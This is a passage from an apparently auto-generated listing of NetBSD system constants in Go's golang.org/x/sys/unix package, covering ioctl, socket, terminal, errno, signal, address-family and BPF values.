0xc0906947 constant SIOCGLIFADDR (line 1274) | SIOCGLIFADDR = 0xc118691d constant SIOCGLIFPHYADDR (line 1275) | SIOCGLIFPHYADDR = 0xc118694b constant SIOCGLINKSTR (line 1276) | SIOCGLINKSTR = 0xc01c6987 constant SIOCGLOWAT (line 1277) | SIOCGLOWAT = 0x40047303 constant SIOCGPGRP (line 1278) | SIOCGPGRP = 0x40047309 constant SIOCGVH (line 1279) | SIOCGVH = 0xc0906983 constant SIOCIFCREATE (line 1280) | SIOCIFCREATE = 0x8090697a constant SIOCIFDESTROY (line 1281) | SIOCIFDESTROY = 0x80906979 constant SIOCIFGCLONERS (line 1282) | SIOCIFGCLONERS = 0xc00c6978 constant SIOCINITIFADDR (line 1283) | SIOCINITIFADDR = 0xc0446984 constant SIOCSDRVSPEC (line 1284) | SIOCSDRVSPEC = 0x801c697b constant SIOCSETPFSYNC (line 1285) | SIOCSETPFSYNC = 0x809069f7 constant SIOCSHIWAT (line 1286) | SIOCSHIWAT = 0x80047300 constant SIOCSIFADDR (line 1287) | SIOCSIFADDR = 0x8090690c constant SIOCSIFADDRPREF (line 1288) | SIOCSIFADDRPREF = 0x8094691f constant SIOCSIFBRDADDR (line 1289) | SIOCSIFBRDADDR = 0x80906913 constant SIOCSIFCAP (line 1290) | SIOCSIFCAP = 0x80206975 constant SIOCSIFDSTADDR (line 1291) | SIOCSIFDSTADDR = 0x8090690e constant SIOCSIFFLAGS (line 1292) | SIOCSIFFLAGS = 0x80906910 constant SIOCSIFGENERIC (line 1293) | SIOCSIFGENERIC = 0x80906939 constant SIOCSIFMEDIA (line 1294) | SIOCSIFMEDIA = 0xc0906935 constant SIOCSIFMETRIC (line 1295) | SIOCSIFMETRIC = 0x80906918 constant SIOCSIFMTU (line 1296) | SIOCSIFMTU = 0x8090697f constant SIOCSIFNETMASK (line 1297) | SIOCSIFNETMASK = 0x80906916 constant SIOCSIFPHYADDR (line 1298) | SIOCSIFPHYADDR = 0x80406946 constant SIOCSLIFPHYADDR (line 1299) | SIOCSLIFPHYADDR = 0x8118694a constant SIOCSLINKSTR (line 1300) | SIOCSLINKSTR = 0x801c6988 constant SIOCSLOWAT (line 1301) | SIOCSLOWAT = 0x80047302 constant SIOCSPGRP (line 1302) | SIOCSPGRP = 0x80047308 constant SIOCSVH (line 1303) | SIOCSVH = 0xc0906982 constant SIOCZIFDATA (line 1304) | SIOCZIFDATA = 0xc0946986 constant SOCK_CLOEXEC (line 1305) | SOCK_CLOEXEC = 0x10000000 constant SOCK_DGRAM (line 1306) | SOCK_DGRAM = 0x2 constant SOCK_FLAGS_MASK (line 1307) | SOCK_FLAGS_MASK = 0xf0000000 constant SOCK_NONBLOCK (line 1308) | SOCK_NONBLOCK = 0x20000000 constant SOCK_NOSIGPIPE (line 1309) | SOCK_NOSIGPIPE = 0x40000000 constant SOCK_RAW (line 1310) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1311) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1312) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1313) | SOCK_STREAM = 0x1 constant SOL_SOCKET (line 1314) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1315) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1316) | SO_ACCEPTCONN = 0x2 constant SO_ACCEPTFILTER (line 1317) | SO_ACCEPTFILTER = 0x1000 constant SO_BROADCAST (line 1318) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1319) | SO_DEBUG = 0x1 constant SO_DONTROUTE (line 1320) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1321) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1322) | SO_KEEPALIVE = 0x8 constant SO_LINGER (line 1323) | SO_LINGER = 0x80 constant SO_NOHEADER (line 1324) | SO_NOHEADER = 0x100a constant SO_NOSIGPIPE (line 1325) | SO_NOSIGPIPE = 0x800 constant SO_OOBINLINE (line 1326) | SO_OOBINLINE = 0x100 constant SO_OVERFLOWED (line 1327) | SO_OVERFLOWED = 0x1009 constant SO_RCVBUF (line 1328) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1329) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1330) | SO_RCVTIMEO = 0x100c constant SO_REUSEADDR (line 1331) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1332) | SO_REUSEPORT = 0x200 constant SO_SNDBUF (line 1333) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1334) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1335) | SO_SNDTIMEO = 0x100b constant SO_TIMESTAMP (line 1336) | SO_TIMESTAMP = 0x2000 constant SO_TYPE (line 1337) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1338) | SO_USELOOPBACK = 0x40 constant SYSCTL_VERSION (line 1339) | SYSCTL_VERSION = 0x1000000 constant SYSCTL_VERS_0 (line 1340) | SYSCTL_VERS_0 = 0x0 constant SYSCTL_VERS_1 (line 1341) | SYSCTL_VERS_1 = 0x1000000 constant SYSCTL_VERS_MASK (line 1342) | SYSCTL_VERS_MASK = 0xff000000 constant S_ARCH1 (line 1343) | S_ARCH1 = 0x10000 constant S_ARCH2 (line 1344) | S_ARCH2 = 0x20000 constant S_BLKSIZE (line 1345) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1346) | S_IEXEC = 0x40 constant S_IFBLK (line 1347) | S_IFBLK = 0x6000 constant S_IFCHR (line 1348) | S_IFCHR = 0x2000 constant S_IFDIR (line 1349) | S_IFDIR = 0x4000 constant S_IFIFO (line 1350) | S_IFIFO = 0x1000 constant S_IFLNK (line 1351) | S_IFLNK = 0xa000 constant S_IFMT (line 1352) | S_IFMT = 0xf000 constant S_IFREG (line 1353) | S_IFREG = 0x8000 constant S_IFSOCK (line 1354) | S_IFSOCK = 0xc000 constant S_IFWHT (line 1355) | S_IFWHT = 0xe000 constant S_IREAD (line 1356) | S_IREAD = 0x100 constant S_IRGRP (line 1357) | S_IRGRP = 0x20 constant S_IROTH (line 1358) | S_IROTH = 0x4 constant S_IRUSR (line 1359) | S_IRUSR = 0x100 constant S_IRWXG (line 1360) | S_IRWXG = 0x38 constant S_IRWXO (line 1361) | S_IRWXO = 0x7 constant S_IRWXU (line 1362) | S_IRWXU = 0x1c0 constant S_ISGID (line 1363) | S_ISGID = 0x400 constant S_ISTXT (line 1364) | S_ISTXT = 0x200 constant S_ISUID (line 1365) | S_ISUID = 0x800 constant S_ISVTX (line 1366) | S_ISVTX = 0x200 constant S_IWGRP (line 1367) | S_IWGRP = 0x10 constant S_IWOTH (line 1368) | S_IWOTH = 0x2 constant S_IWRITE (line 1369) | S_IWRITE = 0x80 constant S_IWUSR (line 1370) | S_IWUSR = 0x80 constant S_IXGRP (line 1371) | S_IXGRP = 0x8 constant S_IXOTH (line 1372) | S_IXOTH = 0x1 constant S_IXUSR (line 1373) | S_IXUSR = 0x40 constant S_LOGIN_SET (line 1374) | S_LOGIN_SET = 0x1 constant TCIFLUSH (line 1375) | TCIFLUSH = 0x1 constant TCIOFLUSH (line 1376) | TCIOFLUSH = 0x3 constant TCOFLUSH (line 1377) | TCOFLUSH = 0x2 constant TCP_CONGCTL (line 1378) | TCP_CONGCTL = 0x20 constant TCP_KEEPCNT (line 1379) | TCP_KEEPCNT = 0x6 constant TCP_KEEPIDLE (line 1380) | TCP_KEEPIDLE = 0x3 constant TCP_KEEPINIT (line 1381) | TCP_KEEPINIT = 0x7 constant TCP_KEEPINTVL (line 1382) | TCP_KEEPINTVL = 0x5 constant TCP_MAXBURST (line 1383) | TCP_MAXBURST = 0x4 constant TCP_MAXSEG (line 1384) | TCP_MAXSEG = 0x2 constant TCP_MAXWIN (line 1385) | TCP_MAXWIN = 0xffff constant TCP_MAX_WINSHIFT (line 1386) | TCP_MAX_WINSHIFT = 0xe constant TCP_MD5SIG (line 1387) | TCP_MD5SIG = 0x10 constant TCP_MINMSS (line 1388) | TCP_MINMSS = 0xd8 constant TCP_MSS (line 1389) | TCP_MSS = 0x218 constant TCP_NODELAY (line 1390) | TCP_NODELAY = 0x1 constant TCSAFLUSH (line 1391) | TCSAFLUSH = 0x2 constant TIOCCBRK (line 1392) | TIOCCBRK = 0x2000747a constant TIOCCDTR (line 1393) | TIOCCDTR = 0x20007478 constant TIOCCONS (line 1394) | TIOCCONS = 0x80047462 constant TIOCDCDTIMESTAMP (line 1395) | TIOCDCDTIMESTAMP = 0x400c7458 constant TIOCDRAIN (line 1396) | TIOCDRAIN = 0x2000745e constant TIOCEXCL (line 1397) | TIOCEXCL = 0x2000740d constant TIOCEXT (line 1398) | TIOCEXT = 0x80047460 constant TIOCFLAG_CDTRCTS (line 1399) | TIOCFLAG_CDTRCTS = 0x10 constant TIOCFLAG_CLOCAL (line 1400) | TIOCFLAG_CLOCAL = 0x2 constant TIOCFLAG_CRTSCTS (line 1401) | TIOCFLAG_CRTSCTS = 0x4 constant TIOCFLAG_MDMBUF (line 1402) | TIOCFLAG_MDMBUF = 0x8 constant TIOCFLAG_SOFTCAR (line 1403) | TIOCFLAG_SOFTCAR = 0x1 constant TIOCFLUSH (line 1404) | TIOCFLUSH = 0x80047410 constant TIOCGETA (line 1405) | TIOCGETA = 0x402c7413 constant TIOCGETD (line 1406) | TIOCGETD = 0x4004741a constant TIOCGFLAGS (line 1407) | TIOCGFLAGS = 0x4004745d constant TIOCGLINED (line 1408) | TIOCGLINED = 0x40207442 constant TIOCGPGRP (line 1409) | TIOCGPGRP = 0x40047477 constant TIOCGQSIZE (line 1410) | TIOCGQSIZE = 0x40047481 constant TIOCGRANTPT (line 1411) | TIOCGRANTPT = 0x20007447 constant TIOCGSID (line 1412) | TIOCGSID = 0x40047463 constant TIOCGSIZE (line 1413) | TIOCGSIZE = 0x40087468 constant TIOCGWINSZ (line 1414) | TIOCGWINSZ = 0x40087468 constant TIOCMBIC (line 1415) | TIOCMBIC = 0x8004746b constant TIOCMBIS (line 1416) | TIOCMBIS = 0x8004746c constant TIOCMGET (line 1417) | TIOCMGET = 0x4004746a constant TIOCMSET (line 1418) | TIOCMSET = 0x8004746d constant TIOCM_CAR (line 1419) | TIOCM_CAR = 0x40 constant TIOCM_CD (line 1420) | TIOCM_CD = 0x40 constant TIOCM_CTS (line 1421) | TIOCM_CTS = 0x20 constant TIOCM_DSR (line 1422) | TIOCM_DSR = 0x100 constant TIOCM_DTR (line 1423) | TIOCM_DTR = 0x2 constant TIOCM_LE (line 1424) | TIOCM_LE = 0x1 constant TIOCM_RI (line 1425) | TIOCM_RI = 0x80 constant TIOCM_RNG (line 1426) | TIOCM_RNG = 0x80 constant TIOCM_RTS (line 1427) | TIOCM_RTS = 0x4 constant TIOCM_SR (line 1428) | TIOCM_SR = 0x10 constant TIOCM_ST (line 1429) | TIOCM_ST = 0x8 constant TIOCNOTTY (line 1430) | TIOCNOTTY = 0x20007471 constant TIOCNXCL (line 1431) | TIOCNXCL = 0x2000740e constant TIOCOUTQ (line 1432) | TIOCOUTQ = 0x40047473 constant TIOCPKT (line 1433) | TIOCPKT = 0x80047470 constant TIOCPKT_DATA (line 1434) | TIOCPKT_DATA = 0x0 constant TIOCPKT_DOSTOP (line 1435) | TIOCPKT_DOSTOP = 0x20 constant TIOCPKT_FLUSHREAD (line 1436) | TIOCPKT_FLUSHREAD = 0x1 constant TIOCPKT_FLUSHWRITE (line 1437) | TIOCPKT_FLUSHWRITE = 0x2 constant TIOCPKT_IOCTL (line 1438) | TIOCPKT_IOCTL = 0x40 constant TIOCPKT_NOSTOP (line 1439) | TIOCPKT_NOSTOP = 0x10 constant TIOCPKT_START (line 1440) | TIOCPKT_START = 0x8 constant TIOCPKT_STOP (line 1441) | TIOCPKT_STOP = 0x4 constant TIOCPTMGET (line 1442) | TIOCPTMGET = 0x40287446 constant TIOCPTSNAME (line 1443) | TIOCPTSNAME = 0x40287448 constant TIOCRCVFRAME (line 1444) | TIOCRCVFRAME = 0x80047445 constant TIOCREMOTE (line 1445) | TIOCREMOTE = 0x80047469 constant TIOCSBRK (line 1446) | TIOCSBRK = 0x2000747b constant TIOCSCTTY (line 1447) | TIOCSCTTY = 0x20007461 constant TIOCSDTR (line 1448) | TIOCSDTR = 0x20007479 constant TIOCSETA (line 1449) | TIOCSETA = 0x802c7414 constant TIOCSETAF (line 1450) | TIOCSETAF = 0x802c7416 constant TIOCSETAW (line 1451) | TIOCSETAW = 0x802c7415 constant TIOCSETD (line 1452) | TIOCSETD = 0x8004741b constant TIOCSFLAGS (line 1453) | TIOCSFLAGS = 0x8004745c constant TIOCSIG (line 1454) | TIOCSIG = 0x2000745f constant TIOCSLINED (line 1455) | TIOCSLINED = 0x80207443 constant TIOCSPGRP (line 1456) | TIOCSPGRP = 0x80047476 constant TIOCSQSIZE (line 1457) | TIOCSQSIZE = 0x80047480 constant TIOCSSIZE (line 1458) | TIOCSSIZE = 0x80087467 constant TIOCSTART (line 1459) | TIOCSTART = 0x2000746e constant TIOCSTAT (line 1460) | TIOCSTAT = 0x80047465 constant TIOCSTI (line 1461) | TIOCSTI = 0x80017472 constant TIOCSTOP (line 1462) | TIOCSTOP = 0x2000746f constant TIOCSWINSZ (line 1463) | TIOCSWINSZ = 0x80087467 constant TIOCUCNTL (line 1464) | TIOCUCNTL = 0x80047466 constant TIOCXMTFRAME (line 1465) | TIOCXMTFRAME = 0x80047444 constant TOSTOP (line 1466) | TOSTOP = 0x400000 constant VDISCARD (line 1467) | VDISCARD = 0xf constant VDSUSP (line 1468) | VDSUSP = 0xb constant VEOF (line 1469) | VEOF = 0x0 constant VEOL (line 1470) | VEOL = 0x1 constant VEOL2 (line 1471) | VEOL2 = 0x2 constant VERASE (line 1472) | VERASE = 0x3 constant VINTR (line 1473) | VINTR = 0x8 constant VKILL (line 1474) | VKILL = 0x5 constant VLNEXT (line 1475) | VLNEXT = 0xe constant VMIN (line 1476) | VMIN = 0x10 constant VQUIT (line 1477) | VQUIT = 0x9 constant VREPRINT (line 1478) | VREPRINT = 0x6 constant VSTART (line 1479) | VSTART = 0xc constant VSTATUS (line 1480) | VSTATUS = 0x12 constant VSTOP (line 1481) | VSTOP = 0xd constant VSUSP (line 1482) | VSUSP = 0xa constant VTIME (line 1483) | VTIME = 0x11 constant VWERASE (line 1484) | VWERASE = 0x4 constant WALL (line 1485) | WALL = 0x8 constant WALLSIG (line 1486) | WALLSIG = 0x8 constant WALTSIG (line 1487) | WALTSIG = 0x4 constant WCLONE (line 1488) | WCLONE = 0x4 constant WCOREFLAG (line 1489) | WCOREFLAG = 0x80 constant WNOHANG (line 1490) | WNOHANG = 0x1 constant WNOWAIT (line 1491) | WNOWAIT = 0x10000 constant WNOZOMBIE (line 1492) | WNOZOMBIE = 0x20000 constant WOPTSCHECKED (line 1493) | WOPTSCHECKED = 0x40000 constant WSTOPPED (line 1494) | WSTOPPED = 0x7f constant WUNTRACED (line 1495) | WUNTRACED = 0x2 constant E2BIG (line 1500) | E2BIG = syscall.Errno(0x7) constant EACCES (line 1501) | EACCES = syscall.Errno(0xd) constant EADDRINUSE (line 1502) | EADDRINUSE = syscall.Errno(0x30) constant EADDRNOTAVAIL (line 1503) | EADDRNOTAVAIL = syscall.Errno(0x31) constant EAFNOSUPPORT (line 1504) | EAFNOSUPPORT = syscall.Errno(0x2f) constant EAGAIN (line 1505) | EAGAIN = syscall.Errno(0x23) constant EALREADY (line 1506) | EALREADY = syscall.Errno(0x25) constant EAUTH (line 1507) | EAUTH = syscall.Errno(0x50) constant EBADF (line 1508) | EBADF = syscall.Errno(0x9) constant EBADMSG (line 1509) | EBADMSG = syscall.Errno(0x58) constant EBADRPC (line 1510) | EBADRPC = syscall.Errno(0x48) constant EBUSY (line 1511) | EBUSY = syscall.Errno(0x10) constant ECANCELED (line 1512) | ECANCELED = syscall.Errno(0x57) constant ECHILD (line 1513) | ECHILD = syscall.Errno(0xa) constant ECONNABORTED (line 1514) | ECONNABORTED = syscall.Errno(0x35) constant ECONNREFUSED (line 1515) | ECONNREFUSED = syscall.Errno(0x3d) constant ECONNRESET (line 1516) | ECONNRESET = syscall.Errno(0x36) constant EDEADLK (line 1517) | EDEADLK = syscall.Errno(0xb) constant EDESTADDRREQ (line 1518) | EDESTADDRREQ = syscall.Errno(0x27) constant EDOM (line 1519) | EDOM = syscall.Errno(0x21) constant EDQUOT (line 1520) | EDQUOT = syscall.Errno(0x45) constant EEXIST (line 1521) | EEXIST = syscall.Errno(0x11) constant EFAULT (line 1522) | EFAULT = syscall.Errno(0xe) constant EFBIG (line 1523) | EFBIG = syscall.Errno(0x1b) constant EFTYPE (line 1524) | EFTYPE = syscall.Errno(0x4f) constant EHOSTDOWN (line 1525) | EHOSTDOWN = syscall.Errno(0x40) constant EHOSTUNREACH (line 1526) | EHOSTUNREACH = syscall.Errno(0x41) constant EIDRM (line 1527) | EIDRM = syscall.Errno(0x52) constant EILSEQ (line 1528) | EILSEQ = syscall.Errno(0x55) constant EINPROGRESS (line 1529) | EINPROGRESS = syscall.Errno(0x24) constant EINTR (line 1530) | EINTR = syscall.Errno(0x4) constant EINVAL (line 1531) | EINVAL = syscall.Errno(0x16) constant EIO (line 1532) | EIO = syscall.Errno(0x5) constant EISCONN (line 1533) | EISCONN = syscall.Errno(0x38) constant EISDIR (line 1534) | EISDIR = syscall.Errno(0x15) constant ELAST (line 1535) | ELAST = syscall.Errno(0x60) constant ELOOP (line 1536) | ELOOP = syscall.Errno(0x3e) constant EMFILE (line 1537) | EMFILE = syscall.Errno(0x18) constant EMLINK (line 1538) | EMLINK = syscall.Errno(0x1f) constant EMSGSIZE (line 1539) | EMSGSIZE = syscall.Errno(0x28) constant EMULTIHOP (line 1540) | EMULTIHOP = syscall.Errno(0x5e) constant ENAMETOOLONG (line 1541) | ENAMETOOLONG = syscall.Errno(0x3f) constant ENEEDAUTH (line 1542) | ENEEDAUTH = syscall.Errno(0x51) constant ENETDOWN (line 1543) | ENETDOWN = syscall.Errno(0x32) constant ENETRESET (line 1544) | ENETRESET = syscall.Errno(0x34) constant ENETUNREACH (line 1545) | ENETUNREACH = syscall.Errno(0x33) constant ENFILE (line 1546) | ENFILE = syscall.Errno(0x17) constant ENOATTR (line 1547) | ENOATTR = syscall.Errno(0x5d) constant ENOBUFS (line 1548) | ENOBUFS = syscall.Errno(0x37) constant ENODATA (line 1549) | ENODATA = syscall.Errno(0x59) constant ENODEV (line 1550) | ENODEV = syscall.Errno(0x13) constant ENOENT (line 1551) | ENOENT = syscall.Errno(0x2) constant ENOEXEC (line 1552) | ENOEXEC = syscall.Errno(0x8) constant ENOLCK (line 1553) | ENOLCK = syscall.Errno(0x4d) constant ENOLINK (line 1554) | ENOLINK = syscall.Errno(0x5f) constant ENOMEM (line 1555) | ENOMEM = syscall.Errno(0xc) constant ENOMSG (line 1556) | ENOMSG = syscall.Errno(0x53) constant ENOPROTOOPT (line 1557) | ENOPROTOOPT = syscall.Errno(0x2a) constant ENOSPC (line 1558) | ENOSPC = syscall.Errno(0x1c) constant ENOSR (line 1559) | ENOSR = syscall.Errno(0x5a) constant ENOSTR (line 1560) | ENOSTR = syscall.Errno(0x5b) constant ENOSYS (line 1561) | ENOSYS = syscall.Errno(0x4e) constant ENOTBLK (line 1562) | ENOTBLK = syscall.Errno(0xf) constant ENOTCONN (line 1563) | ENOTCONN = syscall.Errno(0x39) constant ENOTDIR (line 1564) | ENOTDIR = syscall.Errno(0x14) constant ENOTEMPTY (line 1565) | ENOTEMPTY = syscall.Errno(0x42) constant ENOTSOCK (line 1566) | ENOTSOCK = syscall.Errno(0x26) constant ENOTSUP (line 1567) | ENOTSUP = syscall.Errno(0x56) constant ENOTTY (line 1568) | ENOTTY = syscall.Errno(0x19) constant ENXIO (line 1569) | ENXIO = syscall.Errno(0x6) constant EOPNOTSUPP (line 1570) | EOPNOTSUPP = syscall.Errno(0x2d) constant EOVERFLOW (line 1571) | EOVERFLOW = syscall.Errno(0x54) constant EPERM (line 1572) | EPERM = syscall.Errno(0x1) constant EPFNOSUPPORT (line 1573) | EPFNOSUPPORT = syscall.Errno(0x2e) constant EPIPE (line 1574) | EPIPE = syscall.Errno(0x20) constant EPROCLIM (line 1575) | EPROCLIM = syscall.Errno(0x43) constant EPROCUNAVAIL (line 1576) | EPROCUNAVAIL = syscall.Errno(0x4c) constant EPROGMISMATCH (line 1577) | EPROGMISMATCH = syscall.Errno(0x4b) constant EPROGUNAVAIL (line 1578) | EPROGUNAVAIL = syscall.Errno(0x4a) constant EPROTO (line 1579) | EPROTO = syscall.Errno(0x60) constant EPROTONOSUPPORT (line 1580) | EPROTONOSUPPORT = syscall.Errno(0x2b) constant EPROTOTYPE (line 1581) | EPROTOTYPE = syscall.Errno(0x29) constant ERANGE (line 1582) | ERANGE = syscall.Errno(0x22) constant EREMOTE (line 1583) | EREMOTE = syscall.Errno(0x47) constant EROFS (line 1584) | EROFS = syscall.Errno(0x1e) constant ERPCMISMATCH (line 1585) | ERPCMISMATCH = syscall.Errno(0x49) constant ESHUTDOWN (line 1586) | ESHUTDOWN = syscall.Errno(0x3a) constant ESOCKTNOSUPPORT (line 1587) | ESOCKTNOSUPPORT = syscall.Errno(0x2c) constant ESPIPE (line 1588) | ESPIPE = syscall.Errno(0x1d) constant ESRCH (line 1589) | ESRCH = syscall.Errno(0x3) constant ESTALE (line 1590) | ESTALE = syscall.Errno(0x46) constant ETIME (line 1591) | ETIME = syscall.Errno(0x5c) constant ETIMEDOUT (line 1592) | ETIMEDOUT = syscall.Errno(0x3c) constant ETOOMANYREFS (line 1593) | ETOOMANYREFS = syscall.Errno(0x3b) constant ETXTBSY (line 1594) | ETXTBSY = syscall.Errno(0x1a) constant EUSERS (line 1595) | EUSERS = syscall.Errno(0x44) constant EWOULDBLOCK (line 1596) | EWOULDBLOCK = syscall.Errno(0x23) constant EXDEV (line 1597) | EXDEV = syscall.Errno(0x12) constant SIGABRT (line 1602) | SIGABRT = syscall.Signal(0x6) constant SIGALRM (line 1603) | SIGALRM = syscall.Signal(0xe) constant SIGBUS (line 1604) | SIGBUS = syscall.Signal(0xa) constant SIGCHLD (line 1605) | SIGCHLD = syscall.Signal(0x14) constant SIGCONT (line 1606) | SIGCONT = syscall.Signal(0x13) constant SIGEMT (line 1607) | SIGEMT = syscall.Signal(0x7) constant SIGFPE (line 1608) | SIGFPE = syscall.Signal(0x8) constant SIGHUP (line 1609) | SIGHUP = syscall.Signal(0x1) constant SIGILL (line 1610) | SIGILL = syscall.Signal(0x4) constant SIGINFO (line 1611) | SIGINFO = syscall.Signal(0x1d) constant SIGINT (line 1612) | SIGINT = syscall.Signal(0x2) constant SIGIO (line 1613) | SIGIO = syscall.Signal(0x17) constant SIGIOT (line 1614) | SIGIOT = syscall.Signal(0x6) constant SIGKILL (line 1615) | SIGKILL = syscall.Signal(0x9) constant SIGPIPE (line 1616) | SIGPIPE = syscall.Signal(0xd) constant SIGPROF (line 1617) | SIGPROF = syscall.Signal(0x1b) constant SIGPWR (line 1618) | SIGPWR = syscall.Signal(0x20) constant SIGQUIT (line 1619) | SIGQUIT = syscall.Signal(0x3) constant SIGSEGV (line 1620) | SIGSEGV = syscall.Signal(0xb) constant SIGSTOP (line 1621) | SIGSTOP = syscall.Signal(0x11) constant SIGSYS (line 1622) | SIGSYS = syscall.Signal(0xc) constant SIGTERM (line 1623) | SIGTERM = syscall.Signal(0xf) constant SIGTRAP (line 1624) | SIGTRAP = syscall.Signal(0x5) constant SIGTSTP (line 1625) | SIGTSTP = syscall.Signal(0x12) constant SIGTTIN (line 1626) | SIGTTIN = syscall.Signal(0x15) constant SIGTTOU (line 1627) | SIGTTOU = syscall.Signal(0x16) constant SIGURG (line 1628) | SIGURG = syscall.Signal(0x10) constant SIGUSR1 (line 1629) | SIGUSR1 = syscall.Signal(0x1e) constant SIGUSR2 (line 1630) | SIGUSR2 = syscall.Signal(0x1f) constant SIGVTALRM (line 1631) | SIGVTALRM = syscall.Signal(0x1a) constant SIGWINCH (line 1632) | SIGWINCH = syscall.Signal(0x1c) constant SIGXCPU (line 1633) | SIGXCPU = syscall.Signal(0x18) constant SIGXFSZ (line 1634) | SIGXFSZ = syscall.Signal(0x19) FILE: vendor/golang.org/x/sys/unix/zerrors_netbsd_amd64.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_ARP (line 15) | AF_ARP = 0x1c constant AF_BLUETOOTH (line 16) | AF_BLUETOOTH = 0x1f constant AF_CCITT (line 17) | AF_CCITT = 0xa constant AF_CHAOS (line 18) | AF_CHAOS = 0x5 constant AF_CNT (line 19) | AF_CNT = 0x15 constant AF_COIP (line 20) | AF_COIP = 0x14 constant AF_DATAKIT (line 21) | AF_DATAKIT = 0x9 constant AF_DECnet (line 22) | AF_DECnet = 0xc constant AF_DLI (line 23) | AF_DLI = 0xd constant AF_E164 (line 24) | AF_E164 = 0x1a constant AF_ECMA (line 25) | AF_ECMA = 0x8 constant AF_HYLINK (line 26) | AF_HYLINK = 0xf constant AF_IEEE80211 (line 27) | AF_IEEE80211 = 0x20 constant AF_IMPLINK (line 28) | AF_IMPLINK = 0x3 constant AF_INET (line 29) | AF_INET = 0x2 constant AF_INET6 (line 30) | AF_INET6 = 0x18 constant AF_IPX (line 31) | AF_IPX = 0x17 constant AF_ISDN (line 32) | AF_ISDN = 0x1a constant AF_ISO (line 33) | AF_ISO = 0x7 constant AF_LAT (line 34) | AF_LAT = 0xe constant AF_LINK (line 35) | AF_LINK = 0x12 constant AF_LOCAL (line 36) | AF_LOCAL = 0x1 constant AF_MAX (line 37) | AF_MAX = 0x23 constant AF_MPLS (line 38) | AF_MPLS = 0x21 constant AF_NATM (line 39) | AF_NATM = 0x1b constant AF_NS (line 40) | AF_NS = 0x6 constant AF_OROUTE (line 41) | AF_OROUTE = 0x11 constant AF_OSI (line 42) | AF_OSI = 0x7 constant AF_PUP (line 43) | AF_PUP = 0x4 constant AF_ROUTE (line 44) | AF_ROUTE = 0x22 constant AF_SNA (line 45) | AF_SNA = 0xb constant AF_UNIX (line 46) | AF_UNIX = 0x1 constant AF_UNSPEC (line 47) | AF_UNSPEC = 0x0 constant ARPHRD_ARCNET (line 48) | ARPHRD_ARCNET = 0x7 constant ARPHRD_ETHER (line 49) | ARPHRD_ETHER = 0x1 constant ARPHRD_FRELAY (line 50) | ARPHRD_FRELAY = 0xf constant ARPHRD_IEEE1394 (line 51) | ARPHRD_IEEE1394 = 0x18 constant ARPHRD_IEEE802 (line 52) | ARPHRD_IEEE802 = 0x6 constant ARPHRD_STRIP (line 53) | ARPHRD_STRIP = 0x17 constant B0 (line 54) | B0 = 0x0 constant B110 (line 55) | B110 = 0x6e constant B115200 (line 56) | B115200 = 0x1c200 constant B1200 (line 57) | B1200 = 0x4b0 constant B134 (line 58) | B134 = 0x86 constant B14400 (line 59) | B14400 = 0x3840 constant B150 (line 60) | B150 = 0x96 constant B1800 (line 61) | B1800 = 0x708 constant B19200 (line 62) | B19200 = 0x4b00 constant B200 (line 63) | B200 = 0xc8 constant B230400 (line 64) | B230400 = 0x38400 constant B2400 (line 65) | B2400 = 0x960 constant B28800 (line 66) | B28800 = 0x7080 constant B300 (line 67) | B300 = 0x12c constant B38400 (line 68) | B38400 = 0x9600 constant B460800 (line 69) | B460800 = 0x70800 constant B4800 (line 70) | B4800 = 0x12c0 constant B50 (line 71) | B50 = 0x32 constant B57600 (line 72) | B57600 = 0xe100 constant B600 (line 73) | B600 = 0x258 constant B7200 (line 74) | B7200 = 0x1c20 constant B75 (line 75) | B75 = 0x4b constant B76800 (line 76) | B76800 = 0x12c00 constant B921600 (line 77) | B921600 = 0xe1000 constant B9600 (line 78) | B9600 = 0x2580 constant BIOCFEEDBACK (line 79) | BIOCFEEDBACK = 0x8004427d constant BIOCFLUSH (line 80) | BIOCFLUSH = 0x20004268 constant BIOCGBLEN (line 81) | BIOCGBLEN = 0x40044266 constant BIOCGDLT (line 82) | BIOCGDLT = 0x4004426a constant BIOCGDLTLIST (line 83) | BIOCGDLTLIST = 0xc0104277 constant BIOCGETIF (line 84) | BIOCGETIF = 0x4090426b constant BIOCGFEEDBACK (line 85) | BIOCGFEEDBACK = 0x4004427c constant BIOCGHDRCMPLT (line 86) | BIOCGHDRCMPLT = 0x40044274 constant BIOCGRTIMEOUT (line 87) | BIOCGRTIMEOUT = 0x4010427b constant BIOCGSEESENT (line 88) | BIOCGSEESENT = 0x40044278 constant BIOCGSTATS (line 89) | BIOCGSTATS = 0x4080426f constant BIOCGSTATSOLD (line 90) | BIOCGSTATSOLD = 0x4008426f constant BIOCIMMEDIATE (line 91) | BIOCIMMEDIATE = 0x80044270 constant BIOCPROMISC (line 92) | BIOCPROMISC = 0x20004269 constant BIOCSBLEN (line 93) | BIOCSBLEN = 0xc0044266 constant BIOCSDLT (line 94) | BIOCSDLT = 0x80044276 constant BIOCSETF (line 95) | BIOCSETF = 0x80104267 constant BIOCSETIF (line 96) | BIOCSETIF = 0x8090426c constant BIOCSFEEDBACK (line 97) | BIOCSFEEDBACK = 0x8004427d constant BIOCSHDRCMPLT (line 98) | BIOCSHDRCMPLT = 0x80044275 constant BIOCSRTIMEOUT (line 99) | BIOCSRTIMEOUT = 0x8010427a constant BIOCSSEESENT (line 100) | BIOCSSEESENT = 0x80044279 constant BIOCSTCPF (line 101) | BIOCSTCPF = 0x80104272 constant BIOCSUDPF (line 102) | BIOCSUDPF = 0x80104273 constant BIOCVERSION (line 103) | BIOCVERSION = 0x40044271 constant BPF_A (line 104) | BPF_A = 0x10 constant BPF_ABS (line 105) | BPF_ABS = 0x20 constant BPF_ADD (line 106) | BPF_ADD = 0x0 constant 